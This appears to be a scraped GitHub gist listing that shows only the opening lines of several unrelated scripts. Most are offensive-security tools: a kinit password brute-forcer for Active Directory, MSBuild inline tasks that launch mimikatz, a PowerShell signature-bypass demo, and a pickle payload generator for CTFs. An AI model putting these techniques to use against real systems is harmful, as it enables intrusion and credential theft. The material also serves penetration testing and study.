This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @ | |
| * | |
| 0 | |
| 00 | |
| 0-0 | |
| 000 | |
| 0000 | |
| 00000 |
| #!/bin/bash | |
| # Title: kinit_brute.sh | |
| # Author: @ropnop | |
| # Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller | |
| # The script configures the realm and KDC for you based on the domain provided and the domain controller | |
| # Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf | |
| # Only tested with Heimdal kerberos (error messages might be different for MIT clients) | |
| # Note: this *will* lock out accounts if a domain lockout policy is set. Be careful |
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- This inline task executes c# code. --> | |
| <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe katz.xml --> | |
| <Target Name="Hello"> | |
| <SharpLauncher > | |
| </SharpLauncher> | |
| </Target> | |
| <UsingTask | |
| TaskName="SharpLauncher" | |
| TaskFactory="CodeTaskFactory" |
| ############# | |
| ### SETUP ### | |
| ############# | |
| # Set up remote session | |
| $Credential = Get-Credential TestUser | |
| $AdminCred = Get-Credential Administrator | |
| $SessionOption = New-CimSessionOption -Protocol Dcom | |
| $CimSession = New-CimSession -Credential $Credential -ComputerName TestPC -SessionOption $SessionOption | |
| $AdminCimSession = New-CimSession -Credential $AdminCred -ComputerName TestPC -SessionOption $SessionOption |
| $Host.Runspace.LanguageMode | |
| Get-AuthenticodeSignature -FilePath C:\Demo\bypass_test.psm1 | |
| Get-AuthenticodeSignature -FilePath C:\Demo\notepad_backdoored.exe | |
| # Try to execute the script. Add-Type will fail. | |
| Import-Module C:\Demo\bypass_test.psm1 | |
| $VerifyHashFunc = 'HKLM:\SOFTWARE\Microsoft\Cryptography' + | |
| '\OID\EncodingType 0\CryptSIPDllVerifyIndirectData' |
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- This inline task executes mimikatz. --> | |
| <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe SimpleTasks.csproj --> | |
| <!-- Save This File And Execute The Above Command --> | |
| <!-- Author: Casey Smith, Twitter: @subTee --> | |
| <!-- License: BSD 3-Clause --> | |
| <Target Name="Hello"> | |
| <ClassExample /> | |
| </Target> | |
| <UsingTask |
| #!/bin/sh | |
| TARGETS="192.168.1.0/24" | |
| OPTIONS="-v -T4 -F -sV" | |
| date=$(date +%Y-%m-%d-%H-%M-%S) | |
| cd /nmap/diffs | |
| nmap $OPTIONS $TARGETS -oA scan-$date > /dev/null | |
| slack(){ | |
| curl -F file=@diff-$date -F initial_comment="Internal Port Change Detected" -F channels=#alerts -F token=xxxx-xxxx-xxxx https://slack.com/api/files.upload | |
| } |
| #!/usr/bin/env python | |
| ''' | |
| 0xBADCA7 | |
| Vodka goes down the throat better with pickle. | |
| This script generates pickled object representation. Good for CTFs. | |
| Params: [1] function, [2] parameter, [3] pickle type | |
| Sample run: |